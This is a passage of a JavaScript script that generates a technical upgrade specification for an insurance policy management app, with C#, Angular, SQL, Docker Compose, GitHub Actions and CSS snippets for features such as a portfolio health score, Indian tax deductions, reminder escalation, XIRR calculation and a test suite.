  h3("Overview"),
  body("A computed score (0–100) that evaluates the quality of the family's insurance portfolio across six dimensions. Displayed as an animated radial gauge on the Dashboard."),

  h3("4.1.1  New DTOs — HealthScoreResultDto.cs"),
  ...codeBlock([
    'public class HealthScoreResultDto',
    '{',
    '    public int TotalScore { get; set; }           // 0–100',
    '    public string Grade { get; set; } = "";       // A+, A, B, C, D',
    '    public string GradeLabel { get; set; } = "";  // "Excellent", "Good", ...',
    '    public List<HealthScoreFactor> Factors { get; set; } = new();',
    '}',
    '',
    'public class HealthScoreFactor',
    '{',
    '    public string Name { get; set; } = "";',
    '    public int Score { get; set; }      // Actual points earned',
    '    public int MaxScore { get; set; }   // Maximum possible points',
    '    public string Status { get; set; } = ""; // "Good", "Warning", "Critical"',
    '    public string Recommendation { get; set; } = "";',
    '}',
  ]),
  spacer(),

  h3("4.1.2  New Service — PortfolioHealthScoreService.cs"),
  ...codeBlock([
    'public interface IPortfolioHealthScoreService',
    '{',
    '    Task<HealthScoreResultDto> CalculateAsync(string[] memberNames);',
    '}',
    '',
    'public class PortfolioHealthScoreService : IPortfolioHealthScoreService',
    '{',
    '    public async Task<HealthScoreResultDto> CalculateAsync(string[] memberNames)',
    '    {',
    '        var policies = await GetActivePoliciesForMembers(memberNames);',
    '        var factors  = new List<HealthScoreFactor>();',
    '',
    '        // Factor 1: Coverage adequacy (25 pts)',
    '        // Life cover should be ≥10x of annual premiums paid',
    '        var lifeCover  = policies.Where(p => p.PolicyType?.Name.Contains("Life") == true)',
    '                                 .Sum(p => p.CoverageAmount ?? 0);',
    '        var annualPrem = policies.Sum(p => p.PremiumAmount);',
    '        int coverageScore = lifeCover >= annualPrem * 10 ? 25',
    '                          : lifeCover >= annualPrem * 5  ? 15 : 5;',
    '        factors.Add(new HealthScoreFactor',
    '        {',
    '            Name = "Coverage Adequacy",',
    '            Score = coverageScore, MaxScore = 25,',
    '            Status = coverageScore >= 20 ? "Good" : "Warning",',
    '            Recommendation = coverageScore < 20',
    '                ? "Consider increasing life cover to at least 10x annual premium outflow."',
    '                : "Life cover is adequate.",',
    '        });',
    '',
    '        // Factor 2: Payment discipline (20 pts)',
    '        var overdueCount = policies.Count(p =>',
    '            p.NextInstallmentDate < DateTime.UtcNow && p.Status == "Active");',
    '        int paymentScore = overdueCount == 0 ? 20 : Math.Max(0, 20 - overdueCount * 5);',
    '        factors.Add(new HealthScoreFactor',
    '        {',
    '            Name = "Payment Discipline", Score = paymentScore, MaxScore = 20,',
    '            Status = overdueCount == 0 ? "Good" : "Critical",',
    '            Recommendation = overdueCount > 0',
    '                ? $"{overdueCount} overdue installment(s) found. Pay immediately to avoid lapse."',
    '                : "All payments are current.",',
    '        });',
    '',
    '        // Factor 3: Diversification (15 pts)',
    '        // Factor 4: Nominee completeness (15 pts)',
    '        // Factor 5: Document completeness (10 pts)',
    '        // Factor 6: Renewal health — no policies expiring <30 days (15 pts)',
    '        // ... (same pattern as above)',
    '',
    '        return new HealthScoreResultDto',
    '        {',
    '            TotalScore = factors.Sum(f => f.Score),',
    '            Factors    = factors,',
    '            Grade      = DetermineGrade(factors.Sum(f => f.Score)),',
    '        };',
    '    }',
    '}',
  ]),

  h3("4.1.3  New API Endpoint"),
  makeTable(
    ["Method", "Route", "Auth", "Description"],
    [
      ["GET", "/api/portfoliohealth", "UserOrAdmin", "Returns health score for selected members"],
      ["GET", "/api/portfoliohealth/factors", "UserOrAdmin", "Returns individual factor breakdown"],
    ],
    [1200, 3200, 1800, 3160]
  ),

  h3("4.1.4  Angular Component — portfolio-health-gauge.component.ts"),
  body("New standalone component using SVG to render an animated radial progress gauge. Add to dashboard.component.ts imports."),
  ...codeBlock([
    '@Component({',
    '  selector: "app-health-gauge",',
    '  standalone: true,',
    '  imports: [CommonModule],',
    '  template: `',
    '    <div class="gauge-container">',
    '      <svg viewBox="0 0 200 120" class="gauge-svg">',
    '        <!-- Background arc -->',
    '        <path d="M 20 100 A 80 80 0 0 1 180 100"',
    '              fill="none" stroke="var(--border-subtle)" stroke-width="16"',
    '              stroke-linecap="round"/>',
    '        <!-- Animated score arc -->',
    '        <path [attr.d]="getArcPath()"',
    '              fill="none" [attr.stroke]="getScoreColor()"',
    '              stroke-width="16" stroke-linecap="round"',
    '              class="gauge-progress"/>',
    '        <!-- Score text -->',
    '        <text x="100" y="95" text-anchor="middle"',
    '              class="gauge-score">{{ score }}</text>',
    '        <text x="100" y="115" text-anchor="middle"',
    '              class="gauge-label">{{ grade }}</text>',
    '      </svg>',
    '    </div>',
    '  `',
    '})',
    'export class PortfolioHealthGaugeComponent {',
    '  @Input() score = 0;',
    '  @Input() grade = "";',
    '',
    '  getArcPath(): string {',
    '    const angle = (this.score / 100) * 180;',
    '    const rad   = (angle - 180) * (Math.PI / 180);',
    '    const x     = 100 + 80 * Math.cos(rad);',
    '    const y     = 100 + 80 * Math.sin(rad);',
    '    return `M 20 100 A 80 80 0 ${angle > 90 ? 1 : 0} 1 ${x} ${y}`;',
    '  }',
    '',
    '  getScoreColor(): string {',
    '    if (this.score >= 80) return "#10B981";  // emerald',
    '    if (this.score >= 60) return "#F59E0B";  // amber',
    '    return "#EF4444";                          // rose',
    '  }',
    '}',
  ]),
  spacer(200),

  h2("4.2  Tax Intelligence Module", "sec4-2"),
  h3("Overview"),
  body("India-specific tax benefit calculator covering Section 80C (life insurance premiums up to ₹1.5L), Section 80D (health insurance), and Section 10(10D) (maturity exemption). New route: /tax-planner."),

  h3("4.2.1  New DTOs — TaxSummaryDto.cs"),
  ...codeBlock([
    'public class TaxSummaryDto',
    '{',
    '    public decimal Section80CDeduction    { get; set; }  // Min(lifePremiums, 150000)',
    '    public decimal Section80DDeduction    { get; set; }  // Min(healthPremiums, 25000)',
    '    public decimal TotalDeductions        { get; set; }',
    '    public decimal EstimatedTaxSaving     { get; set; }  // At 30% slab',
    '    public List<TaxLineItemDto> LineItems { get; set; } = new();',
    '    public List<string> Optimizations     { get; set; } = new();',
    '}',
    '',
    'public class TaxLineItemDto',
    '{',
    '    public string PolicyNumber  { get; set; } = "";',
    '    public string PolicyType    { get; set; } = "";',
    '    public string HolderName    { get; set; } = "";',
    '    public decimal Premium      { get; set; }',
    '    public string Section       { get; set; } = "";  // "80C", "80D", "10(10D)"',
    '    public decimal EligibleAmount { get; set; }',
    '}',
  ]),
  spacer(),

  h3("4.2.2  New Service — TaxIntelligenceService.cs"),
  ...codeBlock([
    'public class TaxIntelligenceService : ITaxIntelligenceService',
    '{',
    '    public async Task<TaxSummaryDto> GetCurrentFYTaxBenefitsAsync(string[] members)',
    '    {',
    '        var policies = await GetActivePoliciesForMembers(members);',
    '        var dto      = new TaxSummaryDto();',
    '',
    '        // Section 80C — Life insurance premiums',
    '        var lifePolicies = policies.Where(p =>',
    '            p.PolicyType?.Name.Contains("Life", StringComparison.OrdinalIgnoreCase) == true ||',
    '            p.PolicyType?.Name.Contains("ULIP", StringComparison.OrdinalIgnoreCase) == true);',
    '        var lifePremSum = lifePolicies.Sum(p => p.PremiumAmount);',
    '        dto.Section80CDeduction = Math.Min(lifePremSum, 150_000m);',
    '',
    '        // Section 80D — Health insurance premiums',
    '        var healthPolicies = policies.Where(p =>',
    '            p.PolicyType?.Name.Contains("Health", StringComparison.OrdinalIgnoreCase) == true ||',
    '            p.PolicyType?.Name.Contains("Medical", StringComparison.OrdinalIgnoreCase) == true);',
    '        var healthPremSum = healthPolicies.Sum(p => p.PremiumAmount);',
    '        dto.Section80DDeduction = Math.Min(healthPremSum, 25_000m); // 50K for senior citizens',
    '',
    '        dto.TotalDeductions = dto.Section80CDeduction + dto.Section80DDeduction;',
    '',
    '        // Estimated tax saving at 30% slab (simplified)',
    '        dto.EstimatedTaxSaving = dto.TotalDeductions * 0.30m;',
    '',
    '        // Optimization suggestions',
    '        if (dto.Section80CDeduction < 150_000m)',
    '            dto.Optimizations.Add($"You have ₹{150_000m - dto.Section80CDeduction:N0} remaining 80C room. Consider adding a term life policy.");',
    '        if (dto.Section80DDeduction < 25_000m)',
    '            dto.Optimizations.Add($"You have ₹{25_000m - dto.Section80DDeduction:N0} remaining 80D room. A health top-up plan could be beneficial.");',
    '',
    '        return dto;',
    '    }',
    '}',
  ]),

  h3("4.2.3  New Routes"),
  makeTable(
    ["Method", "Route", "Description"],
    [
      ["GET", "/api/taxintelligence", "Returns current FY tax benefits summary"],
      ["GET", "/api/taxintelligence/lineitems", "Returns per-policy tax breakdown"],
    ],
    [1200, 3600, 4560]
  ),
  body("Frontend: Add /tax-planner route in app.routes.ts. New Angular component: tax-planner.component.ts with a deduction breakdown table and optimization cards."),
  spacer(200),

  h2("4.3  Escalation Reminder System", "sec4-3"),
  h3("4.3.1  New Database Table — ReminderSnooze"),
  ...codeBlock([
    'CREATE TABLE ReminderSnoozes',
    '(',
    '    Id             INT           PRIMARY KEY IDENTITY,',
    '    PolicyId       INT           NOT NULL REFERENCES Policies(Id),',
    '    UserId         INT           NOT NULL REFERENCES Users(Id),',
    '    SnoozeType     NVARCHAR(50)  NOT NULL,  -- "3days", "skip", "stop"',
    '    SnoozeUntil    DATETIME2     NULL,       -- NULL for "stop" type',
    '    CreatedAt      DATETIME2     NOT NULL DEFAULT GETUTCDATE()',
    ');',
  ]),
  spacer(),

  h3("4.3.2  Escalation Logic — ReminderService.cs"),
  ...codeBlock([
    'private static readonly Dictionary<int, NotificationChannel[]> EscalationMatrix',
    '    = new()',
    '    {',
    '        { 30,  new[] { NotificationChannel.InApp, NotificationChannel.Email } },',
    '        { 15,  new[] { NotificationChannel.InApp, NotificationChannel.Email } },',
    '        { 7,   new[] { NotificationChannel.InApp, NotificationChannel.Email,',
    '                       NotificationChannel.WhatsApp } },',
    '        { 3,   new[] { NotificationChannel.InApp, NotificationChannel.Email,',
    '                       NotificationChannel.WhatsApp, NotificationChannel.SMS } },',
    '        { 0,   new[] { NotificationChannel.InApp, NotificationChannel.Email,',
    '                       NotificationChannel.WhatsApp, NotificationChannel.SMS,',
    '                       NotificationChannel.Push } },',
    '    };',
    '',
    'public async Task<int> RunReminderScanAsync()',
    '{',
    '    // Check for active snoozes before creating reminder events:',
    '    var snoozedPolicyIds = await _context.ReminderSnoozes',
    '        .Where(s => s.SnoozeUntil == null || s.SnoozeUntil > DateTime.UtcNow)',
    '        .Select(s => s.PolicyId)',
    '        .ToListAsync();',
    '',
    '    // Exclude snoozed policies from scan results',
    '    // ... rest of existing scan logic ...',
    '}',
  ]),
  spacer(200),

  h2("4.4  IRR / XIRR Calculator", "sec4-4"),
  h3("4.4.1  New Service — IrrCalculatorService.cs"),
  ...codeBlock([
    'public class IrrCalculatorService',
    '{',
    '    /// <summary>',
    '    /// Computes XIRR using Newton-Raphson iteration.',
    '    /// cashflows: negative = outflow (payments), positive = inflow (maturity).',
    '    /// </summary>',
    '    public double CalculateXIRR(',
    '        List<(DateTime date, decimal amount)> cashflows,',
    '        double guess = 0.1,',
    '        int maxIterations = 100)',
    '    {',
    '        var dates = cashflows.Select(c => c.date).ToList();',
    '        var amounts = cashflows.Select(c => (double)c.amount).ToList();',
    '        var t0 = dates[0];',
    '',
    '        double rate = guess;',
    '        for (int i = 0; i < maxIterations; i++)',
    '        {',
    '            double f  = amounts.Select((a, j) =>',
    '                a / Math.Pow(1 + rate, (dates[j] - t0).TotalDays / 365.0)',
    '            ).Sum();',
    '',
    '            double df = amounts.Select((a, j) =>',
    '                -((dates[j] - t0).TotalDays / 365.0) * a',
    '                    / Math.Pow(1 + rate, (dates[j] - t0).TotalDays / 365.0 + 1)',
    '            ).Sum();',
    '',
    '            double newRate = rate - f / df;',
    '            if (Math.Abs(newRate - rate) < 1e-7) return newRate;',
    '            rate = newRate;',
    '        }',
    '        return rate;',
    '    }',
    '',
    '    public IrrResultDto GetPolicyIRR(Policy policy)',
    '    {',
    '        var cashflows = new List<(DateTime, decimal)>();',
    '',
    '        // All premium payments are outflows (negative)',
    '        // Use payment history if available, else project from start date',
    '        if (policy.Payments?.Any() == true)',
    '        {',
    '            cashflows.AddRange(policy.Payments',
    '                .Select(p => (p.PaymentDate, -p.Amount)));',
    '        }',
    '',
    '        // Maturity amount is inflow (positive)',
    '        if (policy.MaturityDate.HasValue && policy.TotalMaturityAmount > 0)',
    '        {',
    '            cashflows.Add((policy.MaturityDate.Value,',
    '                policy.TotalMaturityAmount ?? 0));',
    '        }',
    '',
    '        if (cashflows.Count < 2) return new IrrResultDto { IsCalculable = false };',
    '',
    '        var xirr = CalculateXIRR(cashflows);',
    '        return new IrrResultDto',
    '        {',
    '            IRR = Math.Round(xirr * 100, 2),',
    '            IsCalculable = true,',
    '            BenchmarkFD  = 6.8,   // Current SBI FD rate',
    '            BenchmarkNifty50 = 13.5,  // 10yr CAGR',
    '        };',
    '    }',
    '}',
  ]),

  h3("4.4.2  Add to Policy Detail API"),
  ...codeBlock([
    '// Add to PoliciesController:',
    '[HttpGet("{id}/irr")]',
    '[Authorize(Policy = "UserOrAdmin")]',
    'public async Task<IActionResult> GetPolicyIRR(int id)',
    '{',
    '    var policy = await _context.Policies',
    '        .Include(p => p.Payments)',
    '        .Include(p => p.PolicyType)',
    '        .FirstOrDefaultAsync(p => p.Id == id)',
    '        ?? throw new KeyNotFoundException($"Policy {id} not found.");',
    '',
    '    var result = _irrService.GetPolicyIRR(policy);',
    '    return Ok(ApiResponse<IrrResultDto>.SuccessResponse(result));',
    '}',
  ]),
  pageBreak(),
];

// ─── SECTION 5 — ARCHITECTURE ──────────────────────────────────
const section5 = () => [
  h1("Section 5 — Architecture Upgrades", "sec5"),
  spacer(),

  h2("5.1  CQRS Pattern with MediatR", "sec5-1"),
  h3("Package to Install"),
  ...codeBlock(["dotnet add package MediatR.Extensions.Microsoft.DependencyInjection"]),
  h3("New Folder Structure"),
  ...codeBlock([
    'PolicyManager.API/',
    '├── Application/',
    '│   ├── Policies/',
    '│   │   ├── Queries/',
    '│   │   │   ├── GetPoliciesQuery.cs',
    '│   │   │   ├── GetPoliciesQueryHandler.cs',
    '│   │   │   ├── GetPolicyByIdQuery.cs',
    '│   │   │   └── GetPolicyByIdQueryHandler.cs',
    '│   │   └── Commands/',
    '│   │       ├── CreatePolicyCommand.cs',
    '│   │       ├── CreatePolicyCommandHandler.cs',
    '│   │       ├── UpdatePolicyCommand.cs',
    '│   │       ├── UpdatePolicyCommandHandler.cs',
    '│   │       └── MarkAsPaidCommand.cs',
    '│   │       └── MarkAsPaidCommandHandler.cs',
    '│   └── Dashboard/',
    '│       └── Queries/',
    '│           ├── GetDashboardStatsQuery.cs',
    '│           └── GetDashboardStatsQueryHandler.cs',
    '├── Domain/',
    '│   └── Events/',
    '│       ├── PolicyCreatedEvent.cs',
    '│       └── PolicyPaidEvent.cs',
  ]),
  spacer(),

  h3("Example — CreatePolicyCommand.cs"),
  ...codeBlock([
    'public record CreatePolicyCommand(CreatePolicyDto Dto, int UserId)',
    '    : IRequest<PolicyDto>;',
    '',
    'public class CreatePolicyCommandHandler',
    '    : IRequestHandler<CreatePolicyCommand, PolicyDto>',
    '{',
    '    private readonly AppDbContext _context;',
    '    private readonly IMapper _mapper;',
    '    private readonly IMediator _mediator;',
    '',
    '    public async Task<PolicyDto> Handle(',
    '        CreatePolicyCommand request,',
    '        CancellationToken cancellationToken)',
    '    {',
    '        var policy = _mapper.Map<Policy>(request.Dto);',
    '        policy.PolicyNumber = await GeneratePolicyNumberAsync();',
    '        policy.CreatedByUserId = request.UserId;',
    '',
    '        _context.Policies.Add(policy);',
    '        await _context.SaveChangesAsync(cancellationToken);',
    '',
    '        // Publish domain event — triggers audit log + welcome email',
    '        await _mediator.Publish(new PolicyCreatedEvent',
    '        {',
    '            PolicyId = policy.Id,',
    '            PolicyHolderName = policy.PolicyHolderName,',
    '            UserId = request.UserId,',
    '        }, cancellationToken);',
    '',
    '        return _mapper.Map<PolicyDto>(policy);',
    '    }',
    '}',
  ]),
  spacer(200),

  h2("5.2  NgRx State Management — Angular", "sec5-2"),
  h3("Packages to Install"),
  ...codeBlock([
    'npm install @ngrx/store @ngrx/effects @ngrx/entity @ngrx/store-devtools',
  ]),
  h3("State Shape"),
  ...codeBlock([
    'export interface AppState {',
    '    auth:          AuthState;',
    '    policies:      PolicyState;',
    '    notifications: NotificationState;',
    '    dashboard:     DashboardState;',
    '}',
    '',
    'export interface PolicyState {',
    '    items:        Policy[];',
    '    selectedId:   number | null;',
    '    totalCount:   number;',
    '    filter:       PolicyFilter;',
    '    loading:      boolean;',
    '    error:        string | null;',
    '}',
  ]),
  h3("Policy Actions"),
  ...codeBlock([
    'export const PolicyActions = createActionGroup({',
    '    source: "Policy",',
    '    events: {',
    '        "Load Policies":         props<{ filter: PolicyFilter }>(),',
    '        "Load Policies Success": props<{ result: PagedResult<Policy> }>(),',
    '        "Load Policies Failure": props<{ error: string }>(),',
    '        "Select Policy":         props<{ id: number }>(),',
    '        "Mark As Paid":          props<{ id: number; payment: CreatePayment }>(),',
    '        "Mark As Paid Success":  props<{ policy: Policy }>(),',
    '    },',
    '});',
  ]),
  spacer(200),

  h2("5.3  Docker Compose — Full Stack Setup", "sec5-3"),
  ...codeBlock([
    '# docker-compose.yml',
    'version: "3.9"',
    '',
    'services:',
    '  api:',
    '    build:',
    '      context: ./backend/PolicyManager.API',
    '      dockerfile: Dockerfile',
    '    ports: ["5100:80"]',
    '    environment:',
    '      - ASPNETCORE_ENVIRONMENT=Production',
    '      - ConnectionStrings__Default=Server=db;Database=PolicyDB;...',
    '      - GeminiApi__ApiKey=${GEMINI_API_KEY}',
    '      - JwtSettings__SecretKey=${JWT_SECRET}',
    '      - Redis__ConnectionString=redis:6379',
    '    depends_on: [db, redis]',
    '    volumes:',
    '      - ./uploads:/app/wwwroot/uploads',
    '',
    '  frontend:',
    '    build:',
    '      context: ./frontend',
    '      dockerfile: Dockerfile',
    '    ports: ["80:80", "443:443"]',
    '    depends_on: [api]',
    '',
    '  db:',
    '    image: mcr.microsoft.com/mssql/server:2022-latest',
    '    environment:',
    '      - ACCEPT_EULA=Y',
    '      - SA_PASSWORD=${DB_PASSWORD}',
    '    volumes:',
    '      - sqldata:/var/opt/mssql',
    '',
    '  redis:',
    '    image: redis:7-alpine',
    '    command: redis-server --maxmemory 256mb --maxmemory-policy allkeys-lru',
    '',
    '  seq:',
    '    image: datalust/seq:latest',
    '    ports: ["5341:80"]',
    '    environment:',
    '      - ACCEPT_EULA=Y',
    '',
    'volumes:',
    '  sqldata:',
  ]),
  spacer(200),

  h2("5.4  GitHub Actions CI/CD Pipeline", "sec5-4"),
  ...codeBlock([
    '# .github/workflows/ci-cd.yml',
    'name: PolicyManager CI/CD',
    '',
    'on:',
    '  push:',
    '    branches: [main, develop]',
    '  pull_request:',
    '    branches: [main]',
    '',
    'jobs:',
    '  test-backend:',
    '    runs-on: ubuntu-latest',
    '    steps:',
    '      - uses: actions/checkout@v4',
    '      - uses: actions/setup-dotnet@v4',
    '        with: { dotnet-version: "8.0.x" }',
    '      - run: dotnet restore backend/PolicyManager.API',
    '      - run: dotnet build backend/PolicyManager.API --no-restore',
    '      - run: dotnet test backend/PolicyManager.Tests',
    '               --no-build --collect:"XPlat Code Coverage"',
    '',
    '  test-frontend:',
    '    runs-on: ubuntu-latest',
    '    steps:',
    '      - uses: actions/checkout@v4',
    '      - uses: actions/setup-node@v4',
    '        with: { node-version: "20" }',
    '      - run: npm ci',
    '        working-directory: frontend',
    '      - run: npx ng test --watch=false --browsers=ChromeHeadless',
    '        working-directory: frontend',
    '      - run: npx playwright test',
    '        working-directory: frontend',
    '',
    '  deploy:',
    '    needs: [test-backend, test-frontend]',
    '    if: github.ref == "refs/heads/main"',
    '    runs-on: ubuntu-latest',
    '    steps:',
    '      - name: Build & push Docker images',
    '        run: |',
    '          docker build -t policymanager-api ./backend/PolicyManager.API',
    '          docker build -t policymanager-frontend ./frontend',
    '      - name: Deploy via SSH',
    '        run: |',
    '          ssh ${{ secrets.DEPLOY_HOST }}',
    '            "cd /opt/policymanager && docker compose pull && docker compose up -d"',
    '      - name: Run DB migrations',
    '        run: |',
    '          docker exec policymanager-api',
    '            dotnet ef database update',
    '      - name: Health check',
    '        run: |',
    '          sleep 10',
    '          curl -f https://api.policymanager.in/health',
    '            || (echo "Health check failed" && exit 1)',
  ]),
  pageBreak(),
];

// ─── SECTION 6 — DESIGN SYSTEM ─────────────────────────────────
const section6 = () => [
  h1("Section 6 — Design System Implementation", "sec6"),
  body("All design changes are applied to a single file: src/styles.css. No component-level CSS changes are required for the token migration — CSS variables propagate automatically. Component-specific changes are noted where required."),
  spacer(),

  h2("6.1  CSS Token Migration — styles.css", "sec6-1"),
  h3("Step 1 — Add Font Import (top of styles.css)"),
  ...codeBlock([
    '@import url("https://fonts.googleapis.com/css2?',
    '  family=DM+Sans:ital,opsz,wght@0,9..40,300..800;1,9..40,300..700',
    '  &family=DM+Mono:wght@400;500',
    '  &display=swap");',
  ]),
  spacer(),

  h3("Step 2 — Replace :root Variables"),
  body("Replace the existing :root block entirely with the new 3-tier token system. The mapping table below shows old variable names mapped to new equivalents to ensure smooth migration."),
  makeTable(
    ["Old Variable", "New Variable", "Notes"],
    [
      ["--color-primary", "--brand-primary", "Now maps to #6366F1"],
      ["--color-primary-light", "--text-brand", "For text use only"],
      ["--color-primary-dark", "--brand-primary-hover", "Hover state"],
      ["--bg-card", "--bg-surface", "Default card background"],
      ["--bg-secondary", "--bg-elevated", "Elevated surfaces"],
      ["--glass-bg", "Deprecated — use card variants", "See Section 4.4"],
      ["--glass-border", "--border-default", "Unified border token"],
      ["--color-success", "--status-success", "Green"],
      ["--color-danger", "--status-danger", "Rose (not same red as data-outflow)"],
      ["--color-warning", "--status-warning", "Amber"],
      ["--text-primary", "--text-primary", "No change"],
      ["--text-muted", "--text-muted", "Value updated: #71717A"],
      ["--radius-sm", "--radius-sm", "Value updated: 6px"],
      ["--radius-md", "--radius-md", "Value updated: 10px"],
      ["--radius-lg", "--radius-lg", "Value updated: 16px"],
      ["--transition-base", "--duration-base + --ease-in-out", "Split for precision"],
    ],
    [2800, 2800, 3760]
  ),
  spacer(),

  h3("Step 3 — Update Font Stack"),
  ...codeBlock([
    'body {',
    '    font-family: "DM Sans", -apple-system, system-ui, sans-serif;',
    '    font-optical-sizing: auto;',
    '    font-feature-settings: "kern" 1, "liga" 1, "calt" 1;',
    '}',
    '',
    '/* Policy numbers, amounts — always monospaced */  ',
    '.policy-number, .amount-value, .premium-value,',
    'td.td-mono, code, .metric-value {',
    '    font-family: "DM Mono", "Cascadia Code", monospace;',
    '    font-variant-numeric: tabular-nums;',
    '}',
  ]),
  spacer(200),

  h2("6.2  Card Variants — Replace Glass Everywhere", "sec6-2"),
  body("The current codebase applies .glass-card to every surface — data tables, stats, modals, sidepanels, all with the same treatment. Replace with semantic variant classes."),
  makeTable(
    ["Old Usage", "Replace With", "Where Used"],
    [
      [".glass-card (data tables)", ".card-data", "policy-list, audit-logs, forecast-list"],
      [".glass-card (KPI stats)", ".card-hero", "dashboard stat tiles, forecast KPIs"],
      [".glass-card (modals)", ".card-glass", "all modal-content divs"],
      [".glass-card (sidepanels)", ".card-glass", "policy side panel, notification panel"],
      [".glass-card (forms)", ".card-data", "policy-form sections"],
    ],
    [2600, 2400, 4360]
  ),
  spacer(),
  h3("Add to styles.css"),
  ...codeBlock([
    '.card-data {',
    '    background: var(--bg-surface);',
    '    border: 1px solid var(--border-subtle);',
    '    border-radius: var(--radius-lg);',
    '    overflow: hidden;',
    '}',
    '',
    '.card-hero {',
    '    background: linear-gradient(145deg, var(--bg-elevated) 0%, var(--bg-surface) 100%);',
    '    border: 1px solid var(--border-default);',
    '    border-radius: var(--radius-xl);',
    '    box-shadow: var(--shadow-md);',
    '    position: relative;',
    '    overflow: hidden;',
    '}',
    '.card-hero::before {',
    '    content: "";',
    '    position: absolute; inset: 0;',
    '    background: linear-gradient(180deg, rgba(255,255,255,0.05) 0%, transparent 40%);',
    '    pointer-events: none; border-radius: inherit;',
    '}',
    '',
    '.card-glass {',
    '    background: rgba(24,24,27,0.85);',
    '    backdrop-filter: blur(24px) saturate(180%);',
    '    border: 1px solid rgba(255,255,255,0.07);',
    '    border-radius: var(--radius-xl);',
    '    box-shadow: var(--shadow-xl), inset 0 1px 0 rgba(255,255,255,0.05);',
    '}',
  ]),
  spacer(200),

  h2("6.3  Spinner Component — Standardise Loading States", "sec6-3"),
  h3("New File: src/app/shared/spinner/spinner.component.ts"),
  ...codeBlock([
    '@Component({',
    '    selector: "app-spinner",',
    '    standalone: true,',
    '    template: `',
    '        <div class="spinner-wrap" [class]="size">',
    '            <svg class="spinner-svg" viewBox="0 0 50 50">',
    '                <circle class="spinner-track" cx="25" cy="25" r="20"',
    '                    fill="none" stroke-width="4"/>',
    '                <circle class="spinner-arc" cx="25" cy="25" r="20"',
    '                    fill="none" stroke-width="4"',
    '                    stroke-dasharray="80" stroke-dashoffset="60"',
    '                    stroke-linecap="round"/>',
    '            </svg>',
    '            <span *ngIf="label" class="spinner-label">{{ label }}</span>',
    '        </div>',
    '    `,',
    '    styles: [`',
    '        .spinner-wrap { display:flex; flex-direction:column; align-items:center; gap:12px; }',
    '        .spinner-svg { animation: spin 0.8s linear infinite; }',
    '        .spinner-track { stroke: var(--border-subtle); }',
    '        .spinner-arc   { stroke: var(--brand-primary); }',
    '        @keyframes spin { to { transform: rotate(360deg); } }',
    '        .sm .spinner-svg { width:20px; height:20px; }',
    '        .md .spinner-svg { width:32px; height:32px; }',
    '        .lg .spinner-svg { width:48px; height:48px; }',
    '        .spinner-label { font-size:var(--text-sm); color:var(--text-muted); }',
    '    `]',
    '})',
    'export class SpinnerComponent {',
    '    @Input() size: "sm" | "md" | "lg" = "md";',
    '    @Input() label = "";',
    '}',
    '',
    '// Usage: <app-spinner size="sm" /> or <app-spinner label="Loading policies..." />',
    '// Replace all <div class="spinner"></div> and <div class="loader-ring"> usages',
  ]),
  spacer(200),

  h2("6.4  Empty State Component", "sec6-4"),
  h3("New File: src/app/shared/empty-state/empty-state.component.ts"),
  ...codeBlock([
    '@Component({',
    '    selector: "app-empty-state",',
    '    standalone: true,',
    '    imports: [CommonModule],',
    '    template: `',
    '        <div class="empty-state">',
    '            <div class="empty-icon">',
    '                <span class="material-icons-round">{{ icon }}</span>',
    '            </div>',
    '            <h3 class="empty-title">{{ title }}</h3>',
    '            <p class="empty-description">{{ description }}</p>',
    '            <ng-content></ng-content>',
    '        </div>',
    '    `,',
    '    styles: [`',
    '        .empty-state { text-align:center; padding:64px 32px; }',
    '        .empty-icon { width:72px; height:72px; border-radius:20px;',
    '            background:var(--bg-elevated); margin:0 auto 24px;',
    '            display:flex; align-items:center; justify-content:center; }',
    '        .empty-icon span { font-size:36px; color:var(--text-muted); }',
    '        .empty-title { font-size:var(--text-xl); font-weight:var(--weight-bold);',
    '            color:var(--text-primary); margin:0 0 8px; }',
    '        .empty-description { font-size:var(--text-base); color:var(--text-secondary);',
    '            margin:0 0 24px; max-width:360px; margin-inline:auto; }',
    '    `]',
    '})',
    'export class EmptyStateComponent {',
    '    @Input() icon = "inbox";',
    '    @Input() title = "Nothing here yet";',
    '    @Input() description = "";',
    '}',
    '',
    '// Usage examples:',
    '// <app-empty-state icon="description" title="No policies found"',
    '//     description="Try adjusting your search or create a new policy.">',
    '//     <a routerLink="/policies/new" class="btn btn-primary">New Policy</a>',
    '// </app-empty-state>',
  ]),
  pageBreak(),
];

// ─── SECTION 7 — TESTING ───────────────────────────────────────
const section7 = () => [
  h1("Section 7 — Test Suite Implementation", "sec7"),
  spacer(),

  h2("7.1  Backend — xUnit Test Project Setup", "sec7-1"),
  ...codeBlock([
    '# Create the test project',
    'dotnet new xunit -n PolicyManager.Tests',
    'dotnet add PolicyManager.Tests reference PolicyManager.API',
    'dotnet add PolicyManager.Tests package Moq',
    'dotnet add PolicyManager.Tests package Microsoft.EntityFrameworkCore.InMemory',
    'dotnet add PolicyManager.Tests package FluentAssertions',
  ]),
  spacer(),

  h3("7.1.1  InvestmentForecastService Tests"),
  ...codeBlock([
    'public class InvestmentForecastServiceTests',
    '{',
    '    private readonly IInvestmentForecastService _sut;',
    '    private readonly AppDbContext _db;',
    '',
    '    public InvestmentForecastServiceTests()',
    '    {',
    '        var options = new DbContextOptionsBuilder<AppDbContext>()',
    '            .UseInMemoryDatabase(Guid.NewGuid().ToString())',
    '            .Options;',
    '        _db = new AppDbContext(options);',
    '        _sut = new InvestmentForecastService(_db);',
    '    }',
    '',
    '    [Theory]',
    '    [InlineData("Monthly",    12)]',
    '    [InlineData("Quarterly",   4)]',
    '    [InlineData("Half-Yearly", 2)]',
    '    [InlineData("Yearly",      1)]',
    '    public async Task ProjectInstallments_ReturnsCorrectCount(',
    '        string type, int expectedCount)',
    '    {',
    '        var policy = new Policy',
    '        {',
    '            StartDate         = new DateTime(2025, 4, 1),',
    '            EndDate           = new DateTime(2030, 3, 31),',
    '            NextInstallmentDate = new DateTime(2025, 4, 1),',
    '            InstallmentType   = type,',
    '            InstallmentAmount = 10000,',
    '            PremiumAmount     = 10000,',
    '        };',
    '',
    '        var fyStart = new DateTime(2025, 4, 1);',
    '        var fyEnd   = new DateTime(2026, 3, 31);',
    '',
    '        var result = InvokeProjectInstallments(policy, fyStart, fyEnd);',
    '',
    '        result.Count.Should().Be(expectedCount);',
    '        result.Sum(r => r.amount).Should().Be(10000m * expectedCount);',
    '    }',
    '',
    '    [Fact]',
    '    public async Task OneTime_InstallmentGeneratesNoFutureOccurrences()',
    '    {',
    '        // One Time policy should appear at most once in the FY window',
    '        var policy = new Policy',
    '        {',
    '            InstallmentType   = "One Time",',
    '            NextInstallmentDate = new DateTime(2025, 6, 1),',
